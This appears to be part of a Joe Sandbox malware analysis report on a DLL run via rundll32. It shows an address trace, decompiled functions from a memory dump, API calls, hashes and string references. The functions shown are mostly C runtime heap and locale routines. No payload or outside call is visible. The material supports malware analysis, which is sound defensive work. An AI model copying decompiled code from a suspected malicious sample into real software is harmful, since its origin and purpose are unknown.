0x6e200529
0x6e200536
0x6e20053d
0x6e20053d
0x6e20053f
0x6e200541
0x6e200545
0x6e200545
0x6e20054b
0x6e20054f
0x6e200552
0x6e200558
0x6e20055c
0x6e200560
0x6e200560
0x6e200565
0x6e200565
0x6e200576
0x6e200578
0x6e200579
0x6e20057f
0x6e200586
0x6e2005ae
0x6e2005b8
0x6e2005b8
0x6e2005ba
0x6e200588
0x6e20059a
0x6e20059c
0x6e2005a0
0x6e2005a4
0x6e2005a4
0x6e2005c5
0x6e2005c7
0x6e2005ce
0x6e2005d0
0x6e2005d0
0x6e2005d7
0x6e2005db
0x6e2005de
0x6e2005e4
0x6e2005e4
0x6e2005f2
0x6e2005f8
0x6e200601
0x6e200604
0x6e200608
0x6e20060c
0x6e200610
0x6e2006c1
0x6e2006c1
0x00000000
0x6e200616
0x6e20061f
0x6e200621
0x6e200623
0x6e200629
0x6e20062d
0x6e200631
0x6e200636
0x6e20063c
0x6e200643
0x6e20064a
0x6e200657
0x6e200659
0x6e200659
0x6e20065c
0x6e200660
0x6e200663
0x6e200663
0x6e200669
0x6e200672
0x6e200680
0x6e200680
0x6e200682
0x6e200686
0x6e20068c
0x6e20068c
0x6e200690
0x6e200691
0x6e200693
0x6e20069a
0x6e2006b7
0x6e2006b7
0x6e2006b9
0x6e2006bf
0x00000000
0x6e20069c
0x6e2006a9
0x6e2006ab
0x6e2006c5
0x6e2006c5
0x6e2006cd
0x6e200724
0x6e20072b
0x6e2006cf
0x6e2006cf
0x6e2006d1
0x6e2006da
0x6e2006da
0x6e2006e1
0x6e2006e1
0x6e2006e9
0x6e2006ef
0x6e2006f4
0x6e2006fa
0x6e2006fc
0x6e200702
0x6e200708
0x6e200711
0x6e200715
0x6e20071a
0x6e20071a
0x6e20073d
0x6e20073f
0x6e200743
0x6e200747
0x6e20074a
0x6e200762
0x6e200768
0x6e200768
0x6e20076b
0x6e20074c
0x6e200757
0x6e20075b
0x6e20075b
0x6e20076d
0x6e200772
0x6e200776
0x6e2007ed
0x6e2007ed
0x00000000
0x6e200778
0x6e200778
0x6e20077b
0x6e2007ab
0x6e2007ae
0x6e2007b1
0x6e2007b5
0x6e2007bc
0x6e2007bc
0x6e2007bf
0x6e20077d
0x6e20078e
0x6e200791
0x6e200795
0x6e200798
0x6e200798
0x6e2007c7
0x6e2007c8
0x6e2007c9
0x6e2007cd
0x6e2007d4
0x6e20082a
0x6e20082c
0x6e200830
0x6e2007f2
0x6e2007f4
0x6e2007f5
0x6e2007fc
0x6e200842
0x6e200842
0x6e2007fe
0x6e20080f
0x6e200818
0x6e20081c
0x6e20081c
0x6e200844
0x6e200846
0x6e20084f
0x6e200853
0x6e200855
0x6e200855
0x6e20085c
0x6e20085c
0x6e200869
0x6e20086d
0x6e200873
0x6e200877
0x6e20088d
0x6e200894
0x6e200896
0x6e200899
0x6e20089e
0x6e2008a2
0x6e2008a9
0x6e2008ad
0x6e2008b3
0x6e2008b7
0x6e2008ba
0x6e200924
0x6e20092a
0x6e20092d
0x6e200931
0x6e200933
0x00000000
0x00000000
0x6e20093c
0x6e200940
0x6e200947
0x6e20094b
0x6e20094b
0x6e20094d
0x6e20094f
0x00000000
0x6e2008bc
0x6e2008cc
0x6e2008cf
0x6e2008f6
0x6e2008fc
0x6e200900
0x6e200900
0x6e2008d1
0x6e2008e4
0x6e2008e4
0x6e200907
0x6e200908
0x6e20090f
0x6e20091e
0x6e200955
0x6e200955
0x6e200959
0x6e200966
0x00000000
0x6e200966
0x6e2007d6
0x6e2007e3
0x6e2007e3
0x6e2007e5
0x6e2007e9
0x00000000
0x6e2007e9
0x6e2007d4
0x6e200776
0x6e20069a
0x6e200610
0x6e200980
0x6e200985
0x6e20098a
0x6e20098e
0x6e200991
0x6e200995
0x6e200998
0x6e2009bb
0x6e2009c1
0x6e2009c1
0x6e2009c4
0x6e2009c8
0x6e20099a
0x6e2009aa
0x6e2009ae
0x6e2009ae
0x6e2009db
0x6e2009e3
0x6e2009e7
0x6e2009e8
0x6e2009ef
0x6e200a0c
0x6e200a0c
0x6e200a10
0x6e2009f1
0x6e2009fe
0x6e200a00
0x6e200a00
0x6e200a1a
0x6e200a20
0x6e200a25
0x6e200a38
0x6e200a44
0x6e200a47
0x6e200a5f
0x6e200a5f
0x6e200a49
0x6e200a54
0x6e200a54
0x6e200a6d
0x6e200a78
0x6e200a78
0x6e20034a

APIs

Sleep.KERNELBASE(00000071), ref: 6E2006E9

Strings

Y,n, xrefs: 6E1FFBBB
L, xrefs: 6E200433
DZ,n, xrefs: 6E1FFBED
DZ,n, xrefs: 6E1FFD54
T, xrefs: 6E20023E
Y,n, xrefs: 6E1FFE5C
DZ,n, xrefs: 6E1FFF4B
2, xrefs: 6E1FFF55

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: 2$DZ,n$DZ,n$DZ,n$L$T$Y,n$Y,n
API String ID: 3472027048-304381485
Opcode ID: ab14fc04ed549c28c4de31b0a532c140bed70b84bc4f9a8c0d94e6447a089954
Instruction ID: 4a0a675bf42e61a391a0ac0831cee13419d77d656197b3721e979498ae3cb2c2
Opcode Fuzzy Hash: ab14fc04ed549c28c4de31b0a532c140bed70b84bc4f9a8c0d94e6447a089954
Instruction Fuzzy Hash: CD92DE716483528FCB48CF6AC59956ABBF2BBDA600F40192EF0C5CB391E375C845CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E2078D3, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E6E2078D3(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				intOrPtr* _t19;
				intOrPtr _t21;
				void* _t22;

				E6E2200AC(0x6e268421, __ebx, __edi, __esi, 0);
				_t19 = __ecx;
				_push(8);
				 *__ecx = 0x6e26aa30;
				_t21 = E6E21F8B6(__edx, __esi, __eflags);
				if(_t21 == 0) {
					_t21 = 0;
					__eflags = 0;
				} else {
					 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
					_push(1); // executed
					_t11 = E6E207005(__ebx, _t19, _t21); // executed
					 *((intOrPtr*)(_t21 + 4)) = _t11;
				}
				 *((intOrPtr*)(_t19 + 0x34)) = _t21;
				E6E207F47(_t19);
				return E6E220075(_t19);
			}

0x6e2078da
0x6e2078df
0x6e2078e1
0x6e2078e3
0x6e2078ee
0x6e2078f3
0x6e207906
0x6e207906
0x6e2078f5
0x6e2078f5
0x6e2078f9
0x6e2078fb
0x6e207901
0x6e207901
0x6e20790a
0x6e20790d
0x6e207919

APIs

__EH_prolog3.LIBCMT ref: 6E2078DA
std::locale::_Init.LIBCPMT ref: 6E2078FB

Part of subcall function 6E207005: __EH_prolog3.LIBCMT ref: 6E20700C
Part of subcall function 6E207005: std::_Lockit::_Lockit.LIBCPMT ref: 6E207017
Part of subcall function 6E207005: std::locale::_Setgloballocale.LIBCPMT ref: 6E207032
Part of subcall function 6E207005: _Yarn.LIBCPMT ref: 6E207048
Part of subcall function 6E207005: std::_Lockit::~_Lockit.LIBCPMT ref: 6E207088

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 0ca6e57f01e111cddd69ffcb867a043a36f1cfd2428931c055d9b457b5bc4098
Instruction ID: 75a7b05ee0c68bce66fa10d362e75f8cb1b0a555dd5c666b178b86233fd882a4
Opcode Fuzzy Hash: 0ca6e57f01e111cddd69ffcb867a043a36f1cfd2428931c055d9b457b5bc4098
Instruction Fuzzy Hash: 77E0267AA2162E5FE31167E48511FDDE2977F80B18F62051AD2009F2C0DFF45E0047C1

Uniqueness

Uniqueness Score: -1.00%

Function 6E24C7EF, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E6E24C7EF(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				void* _t16;
				signed int _t17;
				void* _t19;
				signed int _t20;
				long _t21;

				_t16 = __ecx;
				_t20 = _a4;
				if(_t20 == 0) {
					L2:
					_t21 = _t20 * _a8;
					if(_t21 == 0) {
						_t21 = _t21 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6e2c7b04, 8, _t21); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6E25BEB2();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6E242281())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6E249256(_t15, _t16, _t17, _t19, __eflags, _t21);
						_pop(_t16);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t17 = _t13 % _t20;
				if(_t13 / _t20 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6e24c7ef
0x6e24c7f5
0x6e24c7fa
0x6e24c808
0x6e24c808
0x6e24c80e
0x6e24c810
0x6e24c810
0x6e24c827
0x6e24c830
0x6e24c838
0x00000000
0x00000000
0x6e24c818
0x6e24c81a
0x6e24c83c
0x6e24c841
0x6e24c847
0x00000000
0x6e24c847
0x6e24c81d
0x6e24c822
0x6e24c823
0x6e24c825
0x00000000
0x00000000
0x6e24c825
0x00000000
0x6e24c827
0x6e24c800
0x6e24c801
0x6e24c806
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E24D6B4,00000001,00000364,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9), ref: 6E24C830

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9160a24ba11bea7f56121c3526df287b3ef1fc0d64d3d30ab34cfc7694413407
Instruction ID: 3a5aac1f80403b24fa083e3f63f6db80e1e531fb3a1c62784714f822dcba6094
Opcode Fuzzy Hash: 9160a24ba11bea7f56121c3526df287b3ef1fc0d64d3d30ab34cfc7694413407
Instruction Fuzzy Hash: 2BF02B3150052FDBBB5B5AEFC806A47374F9F51F71B0682219C149E180CB30D814C2E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E24F26D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E6E24F26D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				long _t11;

				_t8 = __ecx;
				_t11 = _a4;
				if(_t11 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6E242281())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t11 == 0) {
					_t11 = _t11 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6e2c7b04, 0, _t11); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6E25BEB2();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6E249256(_t7, _t8, _t9, _t10, __eflags, _t11);
					_pop(_t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6e24f26d
0x6e24f273
0x6e24f279
0x6e24f2ab
0x6e24f2b0
0x6e24f2b6
0x00000000
0x6e24f2b6
0x6e24f27d
0x6e24f27f
0x6e24f27f
0x6e24f296
0x6e24f29f
0x6e24f2a7
0x00000000
0x00000000
0x6e24f287
0x6e24f289
0x00000000
0x00000000
0x6e24f28c
0x6e24f291
0x6e24f292
0x6e24f294
0x00000000
0x00000000
0x6e24f294
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 50c7140369a00c0af24c527298b173aa4f97eda55cf677bd71ab1aa88266d8e3
Instruction ID: d08f9745354f46918723af8160d69c7cec27c41a0155eabfe6afdc87fe1b7d67
Opcode Fuzzy Hash: 50c7140369a00c0af24c527298b173aa4f97eda55cf677bd71ab1aa88266d8e3
Instruction Fuzzy Hash: EDE0302A64062BDBF79996E6D814B8B7B9BAFC27A2B2516109D35971C0CB20C900C1A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E21F9E7, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E6E21F9E7(void* __ebx, void* __ecx, void* __edx) {
				void* _t3;
				void* _t10;

				if(E6E22079B() == 0) {
					_push(E6E20815F()); // executed
					_t3 = E6E249E70(__ecx, __edx); // executed
					_pop(_t10);
					if(_t3 == 0) {
						L6E24A4FC(__ebx, _t10);
						goto L5;
					} else {
						return 0;
					}
				} else {
					E6E220604(__edx);
					L5:
					return 1;
				}
			}

0x6e21f9ee
0x6e21f9fc
0x6e21f9fd
0x6e21fa02
0x6e21fa05
0x6e21fa0a
0x00000000
0x6e21fa07
0x6e21fa09
0x6e21fa09
0x6e21f9f0
0x6e21f9f0
0x6e21fa0f
0x6e21fa11
0x6e21fa11

APIs

___isa_available_init.LIBCMT ref: 6E21F9F0

Part of subcall function 6E220604: IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E22061D

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___isa_available_init
String ID:
API String ID: 1134542133-0
Opcode ID: 9730a72df3bd01377a0f65105c100b5bb7fbad41c174d80457b8ba70273eb9d5
Instruction ID: cae7b697ecec913a3442ad7f09779258dbb297b9291b7c4184c29a01fbe2169c
Opcode Fuzzy Hash: 9730a72df3bd01377a0f65105c100b5bb7fbad41c174d80457b8ba70273eb9d5
Instruction Fuzzy Hash: E9C0804C10418F5B7D4423F55634DEF23CF1C491897641CA19630C5851FF09C5425033

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E25E6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E6E25E6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6e2c506c; // 0x2b33ced3
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6e24e03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6E24D5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6E24D5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6e24e03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6e272f04; // 0x17
					E6E25E68F(0, " )'nU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6e24e03b
					E6E25E00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6e24e03b
						E6E25E112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6e24e03b
						E6E25E077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6e272dec; // 0x41
						_t77 = E6E25E68F(_t99, "t!\'nE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6E25E518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6E2545D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6E21F8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6E2545D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6E265124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6E25E112(_t92, _t99,  &_v20);
						} else {
							E6E25E077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,924FAE9A), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,924FAE9A), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D65E
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,924FAE9A), ref: 6E24D66B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E25E7F8
IsValidCodePage.KERNEL32(00000000), ref: 6E25E853
IsValidLocale.KERNEL32(?,00000001), ref: 6E25E862
GetLocaleInfoW.KERNEL32(?,00001001,;$n,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6E25E8AA
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6E25E8C9

Strings

)'nU, xrefs: 6E25E751
t!'nE, xrefs: 6E25E7A5
;$n, xrefs: 6E25E702, 6E25E8A1
;$n, xrefs: 6E25E715, 6E25E725, 6E25E7E5, 6E25E787, 6E25E77C, 6E25E77F, 6E25E78A, 6E25E7E8
;$n, xrefs: 6E25E821, 6E25E7C3, 6E25E7CE

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: )'nU$;$n$;$n$;$n$t!'nE
API String ID: 745075371-2121107865
Opcode ID: 3792e52e968786ec7cb0c6d5d0a354fc8e1d323a8bf583073755eef9a420c387
Instruction ID: 31848dbe8ed06705351c518260bf3401cceb05052acfd820eda98e982d1971bc
Opcode Fuzzy Hash: 3792e52e968786ec7cb0c6d5d0a354fc8e1d323a8bf583073755eef9a420c387
Instruction Fuzzy Hash: 03516D7290021FABEF50DFE5CD48ABE77BAEF05701F044569E920EB250EB709960CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E25DD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E6E25DD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6E24D5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6E25DD27(" )'nU", 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6E25D652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6E25D775();
					} else {
						E6E25D6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6E25DD27("t!\'nE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6E25D775();
							} else {
								E6E25D6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6E25DBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6e24e042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6E25D5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6E242188();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6e2c506c; // 0x2b33ced3
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6E24D5FF(_t89, _t100, _t116);
								_t122 =  *(E6E24D5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6E25E4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6E25806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6E25E5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6E21F8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6E254323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
